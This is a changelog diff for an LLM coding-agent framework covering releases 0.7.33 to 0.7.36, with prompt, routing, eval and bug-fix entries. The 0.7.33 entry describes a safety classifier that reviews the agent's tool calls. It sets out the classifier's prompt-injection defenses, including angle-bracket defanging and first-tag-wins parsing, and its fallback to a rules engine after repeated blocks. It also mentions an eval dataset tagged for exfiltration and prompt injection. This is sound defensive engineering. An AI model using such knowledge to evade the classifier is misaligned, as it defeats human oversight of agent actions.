+ The v0.7.36 design doc originally specified a **multi-alias × multi-task LLM-judge behavioral eval** for FEATURE_143 (96 cells across 8 alias × 6 task × 2 prompt variant) as the load-bearing ship gate, implicitly applicable to FEATURE_119 (parallel-dispatch decision quality, ~20 cells) and FEATURE_131-B (real LLM rollout silent-edit-fail rate, ~60 cells) too — the LLM-rollout-level gold standard. What this release ships instead:
215
+
216
+ - **Three LLM-facing changes** (FEATURE_119 / FEATURE_131-B / FEATURE_143) ship with **structural eval + dataset regression** as the on-CI ship gate (no API keys, no LLM judge, runs deterministically).
217
+ - **The 176-cell multi-alias LLM-judge sweep** (~$30 budget across 8 provider aliases) is **formally tracked** as `FEATURE_146` in [docs/features/v0.7.37.md § v0.7.36 Behavioral Eval Follow-ups](docs/features/v0.7.37.md#v0736-behavioral-eval-follow-ups正式-track非隐式-defer) — a real planned line item with scope, gates, datasets, and rollback policy. `docs/FEATURE_LIST.md` registers FEATURE_146 against the v0.7.37 slot. **This is not an implicit "we'll get to it eventually" — it is a load-bearing v0.7.37 quality gate.**
218
+ - **Risk being explicitly accepted**: production rollouts of v0.7.36 may surface a behavioral regression that the structural gate cannot see (e.g. a model decides to await immediately after dispatch, defeating Pattern B; or post-migration prompt-overlay shifts H0/H1/H2 routing distributions). **Mitigation**: FEATURE_146 ships in v0.7.37 (next release); any sub-eval failure triggers an independent patch release (e.g. `0.7.37.1`) without blocking the v0.7.37 main line (FEATURE_116 / FEATURE_141).
219
+
220
+ ### Migration notes
221
+
222
+ - **No breaking changes** for SA-path users — `KODAX_HARNESS_V2` defaults off, `KODAX_ASYNC_DISPATCH` defaults on (Pattern B is the new default but the runtime degrades gracefully via the registered `await_child_task` tool); existing scripts work unchanged.
223
+ - **AMA-path users** see a behavior fix: `plan.promptOverlay` bytes are now read by Workers as system-prompt context rather than user input. This is a *correctness* migration, not a semantic break — Workers behave more correctly post-FEATURE_143.
224
+ - **SDK consumers calling `@kodax/ai` providers directly**: the new `KodaXProviderStreamOptions.onRetryAfter` callback is optional. Existing call sites that don't set it are unaffected; the cost tracker still records `RetryRecord`s through the substrate for any consumer using `@kodax/coding`'s run loop.
225
+ - **SDK consumers calling `@kodax/coding` tools directly**: `edit` / `multi-edit` / `write` / `insert-after-anchor` are now serialized per file path within the same process. Cross-process serialization (FEATURE_125) ships in v0.7.41.
226
+
227
+ ---
228
+
229
+ ## [0.7.35.1] - 2026-05-07
230
+
231
+ > **Milestone tag, not a published release** — `package.json` versions remain at `0.7.35` (4-segment `0.7.35.1` is invalid semver and would be rejected by `npm publish`). The `0.7.35.1` git tag marks this checkpoint; the work below ships under npm version **`0.7.36`** alongside `FEATURE_143`.
232
+
233
+ ### Theme
234
+
235
+ **Structural cleanup patch + AMA worker capability parity fix** — fixes FEATURE_082 (v0.7.24) package-boundary drift, tames 13 hardcoded `~/.kodax/` callsites, AND closes the v0.7.26 FEATURE_084 capability-context bypass that left AMA workers blind to MCP servers / skills / project AGENTS.md / git status / project tree. All changes are byte-equivalent on the existing SA coding path; the **non-coding** consumers of `@kodax/session-lineage` see a behavior delta (a neutral default compaction prompt — empirically validated by a 150-cell prompt eval), and the **AMA path** sees a behavior fix (workers now receive the same 6 capability sections SA workers always saw).
236
+
237
+ ### Refactored
238
+
239
+ - **FEATURE_142 B-R1 — two-layer split for compaction summary prompt** (commits `106c63c` + `a00ed30` hotfix) — `@kodax/session-lineage`'s built-in `SUMMARY_PROMPT` / `UPDATE_SUMMARY_PROMPT` were coding-flavored ("another coding agent", "EXACT file paths, function names", "## Files & Changes" schema, 401-on-/api/auth/login example), violating ADR-021's rule that the generic compaction primitive package must not enumerate coding-specific terminology. Split into two layers: (1) `@kodax/session-lineage` ships neutral `DEFAULT_SUMMARY_PROMPT` / `DEFAULT_UPDATE_SUMMARY_PROMPT` (the candidate-a-conservative winner from a 150-cell prompt eval — 3 candidates × 10 fixtures × 5 aliases at `tests/compaction-prompt.eval.ts`); (2) `@kodax/coding` ships verbatim v0.7.35 `CODING_SUMMARY_PROMPT` / `CODING_UPDATE_SUMMARY_PROMPT`, SHA-locked at `470cb93…` / `86fadb9…` against the v0.7.35 release tree. Three coding callers (`compaction-orchestration.ts` CAP-060, `repl/.../commands.ts` manual `/compact`, and `task-engine/_internal/managed-task/compaction.ts` Runner-driven AMA — the third was missed in the original commit and caught by code review, hence the hotfix) explicitly pass `CODING_*_PROMPT` to preserve byte-equivalent v0.7.35 behavior on every coding path. Caller routing pinned by both a runtime mock (`tryIntelligentCompact` args[7] / args[8]) and a source-level audit (regex match for `CODING_SUMMARY_PROMPT,\s*CODING_UPDATE_SUMMARY_PROMPT` adjacency). Eval finding worth recording: the coding-flavored baseline empirically *outperforms* both neutral candidates on **non-coding** recall too (97.0% vs 93.2% / 92.3%) — coding-flavored wording generalizes well; the split is for architectural correctness, not measured behavior. Generic / non-coding consumers of `@kodax/session-lineage` accept a 2-3pt non-coding-recall regression as the cost of clean layer boundaries.
240
+
241
+ - **FEATURE_142 Batch D — uplift 4 substrate middleware to `@kodax/agent/runtime-middleware/`** (commit `12a2b55`) — Per the audit-narrowed Batch D scope, only modules with pure `@kodax/ai` + `@kodax/session-lineage` deps are uplifted: `compaction-trigger.ts` (`shouldCompact`), `compaction-fallback.ts` (`gracefulCompactDegradation`), `context-window.ts` (`resolveContextWindow` / `DEFAULT_CONTEXT_WINDOW`), `history-cleanup.ts` (`cleanupIncompleteToolCalls` / `validateAndFixToolHistory`). `boundary-tracker-session.ts` was originally listed in the doc but turned out to depend on `@kodax/coding/src/resilience/` (audit miss caught at implementation time) — uplifting it would create an `@kodax/agent → @kodax/coding` cycle, so it stays in coding. Coding-side re-exports preserve every existing import path; SDK consumers via `@kodax/coding`'s barrel see no API break. Two contract-test mock targets (`vi.mock('../compaction-fallback.js', ...)` etc.) shifted to `vi.mock('@kodax/agent', ...)` with `importOriginal` spread so other agent exports stay live.
242
+
243
+ - **FEATURE_142 Batch E — extract capability-sections helper for SA-path dedup** (commit `4018077`) — The 13 capability-context prompt sections previously inlined in `buildSystemPromptSnapshot` (`builder.ts:32-181`) are now hoisted into `buildCapabilityContextSections` at `packages/coding/src/prompts/capability-sections.ts`. SA path (the `runKodaX` direct-call flow) keeps responsibility for cwd resolution + final snapshot assembly; section construction is now a single-function call. SA output is byte-equivalent — `builder.test.ts`'s 11 existing tests are the integration-level guard, plus 6 new unit tests pin canonical id ordering + conditional inclusion in the helper. AMA worker (`role-prompt.ts`) is intentionally NOT wired in this batch; that's `FEATURE_144`, shipped in commit `79c3dbd` under the same milestone (see Fixed section below). The helper lives in `coding/prompts/` rather than `@kodax/agent/` because consumption is coding-internal (a future `@kodax/data-analysis-agent` would have its own builder + role-prompt with its own section set — `prompt-overlay` is coding-routing-specific) and hoisting would force `@kodax/agent → @kodax/skills` / `@kodax/mcp` cross-package deps, breaking the "agent doesn't depend on application packages" promise.
244
+
245
+ ### Added
246
+
247
+ - **FEATURE_145 — agent-home 3-tier resolution helper** (commit `ed7c17d`) — Centralizes 13 hardcoded `path.join(homedir(), '.kodax', ...)` callsites across `@kodax/coding` (3), `@kodax/mcp` (2), `@kodax/repl` (7), `@kodax/session-lineage` (1) into a single `getAgentConfigPath(...)` resolver at `@kodax/agent/runtime/agent-home.ts`. Three-tier priority: (1) programmatic override via `setAgentConfigHome(path)` for substrate-consumer agents (`@kodax/ops-agent` etc.) to redirect at boot; (2) `KODAX_HOME` env var; (3) `~/.kodax/` default. With override unset and env unset, the resolver returns the same byte sequence as the prior hardcoded calls — byte-equivalent for the existing user base. Process-level singleton (not per-call DI) chosen because the callsites are buried in library helpers and threading `configHome` through 30+ helper signatures would invite silent fallbacks on miss. Two callsites intentionally NOT migrated: `@kodax/ai/src/reasoning-overrides.ts` (would create `@kodax/ai → @kodax/agent` dependency cycle; existing inline `process.env.KODAX_HOME ??` already honors the env tier), and `@kodax/skills/src/types.ts:255` (zero-dep-package policy). Project-relative `.kodax/` paths and CWD-relative `path.join('.kodax', 'constructed', ...)` constants are untouched — those name a different concept (per-project config) and use a different root.
248
+
249
+ ### Fixed
250
+
251
+ - **FEATURE_144 — AMA worker capability context parity** (commit `79c3dbd`) — Closes the v0.7.26 FEATURE_084 latent bug where the AMA Runner-driven migration silently dropped 6 of the 13 SA-path capability-context sections from worker prompts: `mcp-capability-context` (active MCP server visibility), `skills-addendum` (skill-specific guidance), `project-agents` (AGENTS.md / CLAUDE.md project rules), `tool-construction` (tool self-construction guidance), `git-context` (branch / status snapshot), `project-snapshot` (lightweight repo tree). Three of these dropouts produced confirmed user-facing bugs (MCP servers invisible to Scout, skills invisible to workers, project CLAUDE.md rules ignored by Generator). `runner-driven.ts` now builds the SA path's capability sections ONCE per AMA entry via `buildCapabilityContextSections()`, filters out the 7 sections AMA-owned by other Runner channels (`workspaceSection` / `prebuiltRepoIntelligenceContext` / Shard 6d-L overlay stitching) so they don't duplicate, joins the remaining 6 into a string, and threads it through `ManagedRolePromptContext.capabilityContextBlock`. `role-prompt.ts` inserts the block right after `workspaceSection` in every role's section array (Scout / Planner / Generator / Evaluator), matching the SA-path adjacency between runtime truth and capability truth. Implementation simpler than the original design (no new public `KodaXContextOptions` fields, no `builder.ts` changes): SA path renders once per session so the per-worker FS-load concern is AMA-specific — a closure-local `prebuiltCapabilityContextBlock` in `runner-driven.ts` caches the result across all workers spawned from the same AMA entry, FS load upper bound stays at 1 per AMA entry regardless of worker count. Best-effort error handling — capability-build failures emit `[fea144:capability-context-build-failed]` resilience-debug events and let the worker fall back to legacy `workspaceSection`-only visibility (matching pre-FEATURE_144 behavior). Structural ship gate: 4 unit tests in `role-prompt.test.ts` (every role renders the block / positioned between workspace and decision summary / legacy callers unaffected / whitespace-only treated as absent) + 3 deterministic ship-gate cases in `tests/ama-worker-capability-parity.eval.ts` (filter retains 6 + drops 7 / all 4 roles render end-to-end with markers / legacy parity). The 4-dimension behavioral eval (instruction-following parity / `mcp_search` call rate / CLAUDE.md compliance / dirty-repo git declaration) requires a multi-provider judge harness build that exceeds patch scope and is tracked as a v0.7.36 follow-up.
252
+
253
+ - **Post-Batch-E review fixes** (commit `928ce59`) — Addresses 4 findings from the FEATURE_145 + Batch E code review: (HIGH-1) document load-time freeze of `KODAX_DIR` / `KODAX_SESSIONS_DIR` / `KODAX_CONFIG_FILE` in `repl/common/utils.ts` and `USER_CONFIG_FILE` in `repl/common/permission-config.ts` — these are public exports evaluated at module import; substrate consumers calling `setAgentConfigHome()` AFTER importing repl will see stale paths, so JSDoc warnings + an inline `storage.ts` reminder document the required ordering; (MEDIUM-1) `McpCapabilityProvider` captures `defaultMcpCacheDir()` once at construction and threads it into every spawned runtime — JSDoc warning documents the construction-time-capture semantics + escape hatch (explicit `options.cacheDir`); (LOW-2) `buildCapabilityContextSections()` previously required callers to pass `executionCwd`, creating a footgun where SA / future AMA paths could resolve cwd differently and drift — the parameter is now optional with internal `resolveExecutionCwd(options.context)` fallback; (BATCH-E-1) added byte-equivalence snapshot test asserting full rendered output structure stays stable post-extraction (normalizes cwd / basename / Node version / platform for cross-platform determinism, guards section ordering and content concatenation, not just metadata).
254
+
255
+ ---
256
+
257
+ ## [0.7.35] - 2026-05-04
258
+
259
+ ### Theme
260
+
261
+ **Hotfix-only release for 3 P0 issues found post-v0.7.34.** No new features. FEATURE_097 (AMA Runner Realtime Todo List) was effectively non-functional in production despite all-green tests because two latent bugs in the parser + prompt prevented the runtime seeding gate from ever firing; FEATURE_092 (Auto Mode Classifier) silently kept using stale provider/model after `/model` swaps. All three are correctness fixes — no protocol or API breakage.
262
+
263
+ ### Fixed
264
+
265
+ - **FEATURE_097 P0 — `coerceManagedProtocolToolPayload` skill_map nesting mismatch** (commit `fcab68c`) — `protocol-emitters.ts` JSON schema (lines 227-236) nests `skill_summary` / `execution_obligations` / `verification_obligations` / `ambiguities` / `projection_confidence` inside a `skill_map` object, but the parser at `managed-protocol.ts:339-355` only read these fields at the top level of the payload. When the LLM emitted the schema-correct nested form, `executionObligations` parsed to `[]`, the runner-level seeding gate (`>= 2 obligations` at `runner-driven.ts:881`) never fired, and the realtime todo plan surface never rendered. Parser now reads top-level OR `skill_map` / `skillMap` (snake + camel), with top-level winning when both are present (back-compat). Also tightened the H0 path in `role-prompt.ts:541` so that ≥2-step tasks at H0_DIRECT MUST go through `emit_scout_verdict` with `executionObligations` populated FIRST — only truly trivial single-step H0 work (typo fix, single-line edit) may complete directly without a verdict. 4-case regression test pinned in `protocol-emitters.test.ts` (snake-case nested, camelCase nested, top-level-wins-on-conflict, defensive non-object skill_map).
266
+ - **FEATURE_097 P0-followup — emit_scout_verdict timing anchor** (commit `32c5205`) — GLM-as-Scout production transcript revealed Scouts treating `emit_scout_verdict` as a *final report* (called after all the work was done) instead of a *plan commitment* (called early, before the work). The TodoListSurface only renders after emit, so late-emit silently breaks FEATURE_097 even when the parser fix correctly reads `executionObligations`. Tightened the Scout role-prompt with an `EMIT TIMING (CRITICAL)` block that (1) reframes `emit_scout_verdict` as plan commitment vs final report, (2) anchors emit to the first 1-2 scoping turns BEFORE main work, (3) lists the report-pattern anti-pattern verbatim, and (4) narrows the trivial-exemption to "exactly ONE distinct execution step" with explicit callout that review/audit/investigation tasks touching ≥2 files/areas/threads MUST emit early even at H0_DIRECT. Pinned `EXECUTION OBLIGATIONS` Heavy block (lines 520-540) untouched so the 64-cell A/B eval pin holds; new TIMING block sits separately so `obligation_coherence` / `simple_overformalization` metrics are unaffected.
267
+ - **FEATURE_092 hotfix-3 — auto-mode classifier defaultProvider/defaultModel staleness** (commit `a1b737a`) — `AutoModeGuardrailConfig.defaultProvider` and `defaultModel` were declared as static `string` fields, captured once at first `getGuardrail()` call. Mid-session `/model` and `/provider` swaps did NOT retarget the auto-mode classifier — it kept calling sideQuery against the original (provider, model) until restart, producing classifier timeouts / errors that escalated to user-confirmation dialogs even though the status bar still read `auto[LLM]`. Compounded in the Ink REPL by a second issue: `runReplApp` declared a top-level `const currentConfig` that was never mutated, so the bootstrap closures `getCurrentProviderName: () => currentConfig.provider` etc. forever returned startup-time values, while the React `useState<CurrentConfig>` (the actual source of truth) was disconnected. Fix has three parts: (1) `AutoModeGuardrailConfig` gains optional `getDefaultProvider?: () => string` / `getDefaultModel?: () => string` fields that take precedence over the static strings inside `buildResolveOptions` — backward compatible since SDK consumers passing `defaultProvider: 'anthropic'` literals still work unchanged; (2) `bootstrapAutoMode` passes live getters wired to `deps.getCurrentProviderName` / `deps.getCurrentModel`, with a warn-log path for empty model; (3) Ink REPL adds `inkCurrentConfigRef` matching the existing `inkAutoModeAskUserRef` / `inkAutoModeEngineChangeRef` pattern — runReplApp-scope ref initialized to `currentConfig`, bootstrap closures read `inkCurrentConfigRef.current.{provider,model,permissionMode}`, component receives `setCurrentConfigRef` prop and syncs via `useEffect(() => setCurrentConfigRef(currentConfig), [currentConfig])`. Readline REPL needed zero changes (its `currentConfig` is a single mutable object and the bootstrap closures pick up live values automatically). Reviewed by 2 sub-agents (architect rejected initial union-type proposal in favor of optional getter fields; code-reviewer caught that closures must capture the ref, not the const, and flagged `getCurrentPermissionMode` for the same fix). 4 new regression tests in `guardrail.test.ts` (getter precedence, per-classify re-evaluation, string-only back-compat, partial getter fallback) + 2 in `auto-mode-bootstrap.test.ts`. `claudeMd` and `rules` deliberately remain captured-at-init by design (mid-session edits to `AGENTS.md` / `~/.kodax/auto-rules.jsonc` are rare; restart applies them).
268
+
269
+ ---
270
+
271
+ ## [0.7.34] - 2026-05-04
272
+
273
+ ### Theme
274
+
275
+ **FEATURE_097 + FEATURE_110 + FEATURE_112 — three orthogonal v0.7.34 deliveries plus Issue 127/128 fixes.** FEATURE_110 removes the v0.3.1-era legacy plan-mode (path 1) so `PermissionMode="plan"` + `exit_plan_mode` (FEATURE_074, path 2) becomes the sole plan-mode entry. FEATURE_097 adds a Claude Code-style realtime todo plan surface to the AMA Runner — Scout's existing `executionObligations: string[]` is the seed; an in-memory `TodoStore` + new `todo_update` tool drive per-step transitions; a 6-row hard-capped `TodoListSurface` renders under the spinner with auto-anchoring + summary folds + failed-item priority + 5 s post-completion linger. FEATURE_112 lifts the read-only investigation harness ceiling (`deriveTopologyCeiling` +complexity dim, SCOPE COMMITMENT investigation/multi-thread anchors, neutral fan-out copy, ceiling semantics gloss) so deep-investigation tasks can promote to H1 + Evaluator audit instead of staying H0 single-shot.
276
+
277
+ ### Added
278
+
279
+ - **FEATURE_097 — AMA Runner Realtime Todo List** (commit `a974c57`) — Claude-aligned visibility surface for AMA tasks. Wires Scout's existing `executionObligations: string[]` to a brand-new `TodoListSurface` Ink component under the spinner. Six-row hard cap with auto-anchor on the first `in_progress`, failed-item priority promotion, and 5 s linger after the last item closes. New `todo_update` tool injected into Scout/Generator/Planner tool sets; Evaluator drives the list via runner-side auto-handling (accept → all complete; revise → in_progress→failed→pending across the retry boundary; replan → reset). Layer 2 throttle reminder injects `<system-reminder>` after 8 quiet rounds (per-task scope, single-fire until reset by `todo_update` success or role transition). Heavy mini-planner role-prompt variant pinned VERBATIM into Scout after a 64-cell A/B eval (8 alias × 4 case × 2 variant): Heavy delivers +14.5pp obligation coherence, -8.3pp simple-task over-formalization, +4.3pp harness correctness with multistep completeness ceiling-saturated at 100% on both variants. §5 design decisions all implemented: (1) accept/revise/replan dispatch via runner-side wrapper; (2) `TURNS_SINCE_TODO_UPDATE_REMINDER = 8` per-task throttle; (3) Layer 3 heuristic dropped (YAGNI); (4) task-scoped lifecycle (no session persistence); (5) unknown-id self-recovery returns `{ok:false, reason:"... Current valid ids: ..."}`. Layer independence preserved: `repl` imports `TodoItem` only via `@kodax/coding` public re-export. 102 hermetic tests across store / tool / throttle / view-model / surface; 2 release-gate evals pinned (`feature-097-h0-mini-planner-strength.eval.ts` for Heavy variant decision, `feature-097-prompt-behaviors.eval.ts` for the 4 prompt-eval triggers — throttle reminder recovery, unknown-id self-recovery, generator step progression, planner refinement).
280
+ - **FEATURE_112 — Investigation-Scale-Aware Routing (read-scope fix)** (commit `b5ff2b0`) — symmetric counterpart to FEATURE_106's mutation-scope fix. (1) `deriveTopologyCeiling` gains a `complexity` dimension so read-only + complex/systemic tasks can have an H1 ceiling instead of being capped at H0; (2) SCOPE COMMITMENT in the Scout role-prompt extends to investigation-scope (`≥5 files OR ≥8 searches → emit H1`) and multi-thread early-decision (`first 1-2 rounds turn up ≥2 independent threads → dispatch_child_task`) anchors, mirroring the existing mutation-scope rule; (3) `fanoutReason` for `primaryTask=unknown` switches from "No high-value shard class detected" (negative dispatch signal) to "Task scope is unclassified; dispatch_child_task remains available if investigation threads emerge"; (4) `topologyCeiling` field in `decisionSummary` gains a one-line semantic gloss for Scout (`H1_EXECUTE_EVAL` reads "Evaluator can audit your conclusion if you escalate to H1") so the lift in (1) has an inference path. ~21 LoC code + ~80 LoC eval dataset + ~140 LoC tests; eval at `tests/feature-112-read-scope-routing.eval.ts` with 4 cases × 3 alias acceptance.
281
+
282
+ ### Removed
283
+
284
+ - **Legacy plan-mode (FEATURE_110, path 1)** (commit `6b1df35`) — deleted `runWithPlanMode` / `listPlans` / `resumePlan` / `clearCompletedPlans` / `PlanStorage` / `planStorage` / `ExecutionPlan` and the `/plan` (`/p`) slash command (with all `/plan on|off|once|list|resume|clear` subcommands). The v0.3.1-era readline + chalk wizard was fully superseded by FEATURE_074's `PermissionMode="plan"` + `exit_plan_mode` tool + Ink-native PlanScrollPanel approval UI (v0.7.20). The two paths could conflict at runtime (e.g. `/plan on` + `PermissionMode="plan"` would block writes via `planModeBlockCheck` after wizard `confirm` already y'd them) and the legacy path's KNOWN_ISSUES backlog (`pendingInputs` not wired) had stayed unaddressed for 2+ versions. Net `~ -603` lines removed, 0 added. **Breaking** for any external SDK consumer importing the listed symbols from `kodax` or `@kodax/repl` — all 7 were undocumented internal exports leaking via `src/index.ts` re-export, not present in README's first-class API table. Existing `~/.kodax/plans/*.json` user data is left in place — users may safely `rm -rf ~/.kodax/plans/` after upgrading; KodaX no longer reads or writes those files.
285
+
286
+ ### Fixed
287
+
288
+ - **Issue 127** (commit `afff423`) — managed-task checkpoint cleanup race in `runManagedTaskViaRunnerInner` left an orphan `checkpoint.json` on every successful single-role H0 task, triggering "found incomplete task / continue / restart / cancel" prompt on the next REPL query. Replaced fire-and-forget `void writeCheckpoint().then(d => last = dir)` with `pendingCheckpointWrites: Promise[]` + `Promise.allSettled` before delete; added `.catch(cleanupRunCheckpoint)` on `Runner.run()` for abort + LLM-error paths; moved cleanup ahead of post-Runner sync block so `buildManagedTaskPayload` / `observer.completed` / `detectScoutSuspiciousSignals` throws cannot bypass cleanup either.
289
+ - **Issue 128** (commit `afff423`) — 9 `__contract-tests__/cap-*.contract.test.ts` end-to-end suites + `orchestration.test.ts` flaked at vitest's 5000ms default under heavy parallel load (211 files concurrently). Bumped per-suite timeout to 15s on those 10 suites only (other 91 contract suites + global `testTimeout` untouched so unit-test perf regressions still surface fast).
290
+
291
+ ---
292
+
293
+ ## [0.7.33] - 2026-05-02
294
+
295
+ ### Theme
296
+
297
+ **FEATURE_092 — Auto Mode Classifier** ships its full release surface. The LLM-reviewed permission tier (Phase 2b classifier core, denial tracker / circuit breaker, model resolver, `AutoModeToolGuardrail` consumer) ships with end-to-end wire-up across both REPL surfaces (readline + Ink), settings / CLI / env override family, slash commands (`/auto-engine`, `/auto-denials`), and a status-bar engine indicator (`Auto[LLM]` green / `Auto[RULES]` yellow) so users can see at a glance whether the classifier downgraded mid-session. The §7 cross-provider release-gate eval (`KODAX_EVAL_AUTO_MODE_CROSS_PROVIDER=1`) verifies 3 cross-provider combos and uncovered a latent bug where `classify()` discarded `sideQuery`'s post-call cost-tracker copy — fixed by threading `setCostTracker` through `ClassifyOptions` so the agent's tracker accumulates classifier calls under `role='auto_mode'`. The canonical `'auto'` permission mode joins `plan` / `accept-edits` (with `'auto-in-project'` retained as a deprecated alias emitting a once-per-session deprecation notice). Status-bar text adopts Title-Case short labels (`Plan` / `Edits` / `Auto[LLM]` / `Auto[RULES]`) matching Claude Code's `permissionModeShortTitle` convention, unified across both readline and Ink surfaces via the new `permissionModeDisplayName` helper.
298
+
299
+ ### Added
300
+
301
+ - **`@kodax/ai sideQuery` API** (Phase 1, commit `a0e3502`) — independent one-shot LLM invocation for features that need a clean call boundary outside the main agent loop. Constraints by design: `tools=[]` hardcoded, text-only output, independent timeout, `querySource` mapped to `TokenUsageRecord.role` for cost bucketing, never throws (all failures produce a result with `stopReason='timeout' | 'aborted' | 'error'`). First consumer is the auto-mode classifier; future consumers include compaction, title generation, SA mutation reflection. 15 tests covering happy path, isolation guarantees, cost tracking, tool-rejection contract, timeout vs caller-abort label fidelity (deterministic `abortCause` tracking eliminates the race), provider-error path.
302
+ - **`@kodax/core GuardrailContext.messages`** (Phase 2a, commit `625fca1`) — optional `messages?: readonly AgentMessage[]` field on `GuardrailContext` so tool-side guardrails can inspect the live conversation transcript without reaching into Runner internals. Runner populates the field at both `beforeTool` and `afterTool` call sites. Backward compatible — existing tool guardrail consumers unaffected.
303
+ - **`@kodax/coding classifier-projection` helpers** (Phase 2b.1) — exports `defaultToClassifierInput(name, input)` (conservative `name + truncated JSON` projection for low-risk structured tools) and `mcpToClassifierInput(server, tool, input)` (hybrid projection: extract action field — method/command/url/query/action priority — then append structural context). 14 tests cover projection format, action priority, structure summarization, edge cases (circular refs, primitives, null).
304
+ - **Auto-rules JSONC loader** (Phase 2b.2, commit `846e7f0`) — three-layer loader (`~/.kodax/auto-rules.jsonc` user, `<project>/.kodax/auto-rules.jsonc` project, `<project>/.kodax/auto-rules.local.jsonc` local) with sha256 fingerprint-based opt-in trust for project rules (`trustProjectRules` / `readTrustState`), hand-rolled string-aware JSONC parser tolerating both `// /* */` comments and trailing commas, "later layer wins position" dedup semantics. 27 tests.
305
+ - **Classifier core** (Phase 2b.3, commit `5bdbebc`) — `classifier-prompt.ts` (system prompt + neutralized envelope: `<rules>`, `<claude_md>`, `<transcript>`, `<action>` with ASCII `< >` defang to `‹ ›` to disarm prompt-injection inside tool_result payloads), `transcript-strip.ts` (drops assistant text/thinking, preserves tool_use/tool_result; 2KB tool_result cap, 8KB total cap; first user message + recent tail kept), `parse-output.ts` (parses `<block>yes|no</block><reason>…</reason>` with FIRST-tag-wins anti-injection, 500-char reason cap), `classify.ts` orchestrator (sideQuery → parse; failure→decision mapping: end_turn→parsed, timeout/error→escalate, aborted→re-throw `DOMException('AbortError')`, unparseable→fail-closed block, tool_use contract violation→block).
306
+ - **Denial tracker + circuit breaker** (Phase 2b.4, commit `0c9f8a0`) — pure functional state machines for the engine-downgrade signal: `DenialTracker` (3 consecutive blocks OR 20 cumulative blocks → fallback to rules engine) and `CircuitBreaker` (5 errors / 10-minute sliding window → fallback). 16 tests.
307
+ - **Classifier model resolver** (Phase 2b.5, commit `0737190`) — 4-layer override chain (env `KODAX_AUTO_MODE_CLASSIFIER_MODEL` → settings.json → CLI flag → main-agent default) with `parseModelSpec("provider:model")` and graceful fallback to the active conversation provider/model. 16 tests.
308
+ - **`AutoModeToolGuardrail` integration** (Phase 2b.6, commit `ef17c70`) — assembles 2b.2 / 2b.3 / 2b.4 / 2b.5 into a single `ToolGuardrail` (FEATURE_085) consumer. Engine starts at the configured value (`'rules'` | `'llm'`); on each tool call it post-records the verdict and downgrades to `'rules'` for the *current* call when the threshold crosses (so the same call that crosses the line is the first to be served by the cheaper engine). Test-only accessors `getEngineForTest` / `getStatsForTest` / `setProviderForTest` for hermetic test wiring. 11 tests.
309
+ - **`PermissionMode` 'auto' canonical + 'auto-in-project' alias** (Phase 2b.7a, commit `2866f26`) — adds `'auto'` as the canonical permission mode and keeps `'auto-in-project'` as a deprecated alias. New helpers `CANONICAL_PERMISSION_MODES`, `isAutoMode(m)`, `canonicalizePermissionMode(m)` for boundary-call canonicalization. `normalizePermissionMode` does NOT auto-canonicalize so callers can preserve the user's spelling for diagnostic output. 7 tests.
310
+ - **Auto-mode classifier eval dataset** (Phase 2b.9) — `benchmark/datasets/auto-mode-classifier/cases.ts` 14 synthetic cases across 6 tags (`exfiltration` ×2, `remote-exec` ×2, `dest-irrev` ×2, `dep-poisoning` ×1, `prompt-inject` ×2, `legit-work` ×5). `cases.test.ts` (8 hermetic shape tests, no LLM). `tests/auto-mode-classifier.eval.ts` skip-by-default Stage 0 stub — opt-in live measurement via `KODAX_EVAL_AUTO_MODE_LIVE=1`; per-alias TP/FP/escalate counters; quality thresholds NOT enforced yet (gated to Stage 1 post-pilot per `benchmark/datasets/auto-mode-classifier/README.md`).
311
+ - **`@kodax/coding` public surface** — auto-mode classifier modules exported under the `// FEATURE_092` heading: `classify`, `loadAutoRules` family, `buildClassifierPrompt`, `stripAssistantText`, `parseClassifierOutput`, denial-tracker family (renamed at the index boundary to `createAutoModeDenialTracker` / `recordAutoModeBlock` / etc. to avoid collision with the FEATURE_044/045 input-signature `DenialTracker` already exported), circuit-breaker family, model-resolver family, `createAutoModeToolGuardrail`, plus all corresponding types.
312
+
313
+ ### Wired through
314
+
315
+ The Phase 2b roadmap shipped in three waves; what follows is the live surface as of release:
316
+
317
+ - **Phase 2b.7b — settings / CLI / env wire-up + Runner registration (shipped)**: `KodaXOptions.guardrails`, `KodaXToolExecutionContext.guardrails`, child-executor guardrail propagation (FEATURE_085 `dispatch_child_task`), `bootstrapAutoMode` factory wired in both the readline REPL (`packages/repl/src/interactive/repl.ts`) and the Ink REPL (`packages/repl/src/ui/InkREPL.tsx`), surface-agnostic `askUser` injection (readline wraps `confirmToolExecution`, Ink wraps `showConfirmDialog`), `~/.kodax/config.json` `autoMode.{engine,classifierModel,timeoutMs}` reader, `KODAX_AUTO_MODE_*` env override family, `auto-in-project` deprecation emitter (once-per-session in both REPLs), `/auto` slash command switches to canonical `'auto'` (no longer the deprecated `'auto-in-project'` alias).
318
+ - **Phase 2b.8 — slash commands + REPL status bar (shipped)**: `/auto-engine [llm|rules]` and `/auto-denials` slash commands wired in both readline and Ink callbacks (`getAutoModeStats`, `setAutoModeEngine`); status-bar engine indicator (`auto[LLM]` green / `auto[rules]` yellow) applied uniformly across the readline status bar (`status-bar.ts`) and the Ink status-bar view-model (`view-models/status-bar.ts`).
319
+ - **§7 cross-provider validation (shipped)**: `tests/auto-mode-cross-provider.eval.ts` — opt-in via `KODAX_EVAL_AUTO_MODE_CROSS_PROVIDER=1`; 3 cross-provider combos (`ds/v4flash → kimi`, `kimi → zhipu/glm51`, `zhipu/glm51 → ds/v4flash`); asserts the classifier provider lands in the cost tracker under `role='auto_mode'`. Run-through uncovered a latent bug where `classify()` discarded `sideQuery`'s post-call tracker copy (immutable pattern) — fixed by threading `setCostTracker` through `ClassifyOptions` so the agent's tracker accumulates classifier calls.
320
+
321
+ The dataset's Stage 1 (`benchmark/datasets/auto-mode-classifier/README.md`) gates the LLM-engine certification on the 8-alias × 70-cell synthetic pilot — see `benchmark/results/2026-05-02T06-54-27Z-auto-mode-classifier-pilot/`. Hard quality thresholds (TP ≥ 95%, FP ≤ 10%, P90 ≤ 5s) graduate to `expect.fail` post-pilot in v0.7.34+ once defaults stabilize. **Deferred to use-it-and-fix:** §5 downgrade-chain UX validation (3 consecutive blocks → engine flip → user prompt) — manual exercise rather than automated since the chain is user-perception-bound.
322
+
323
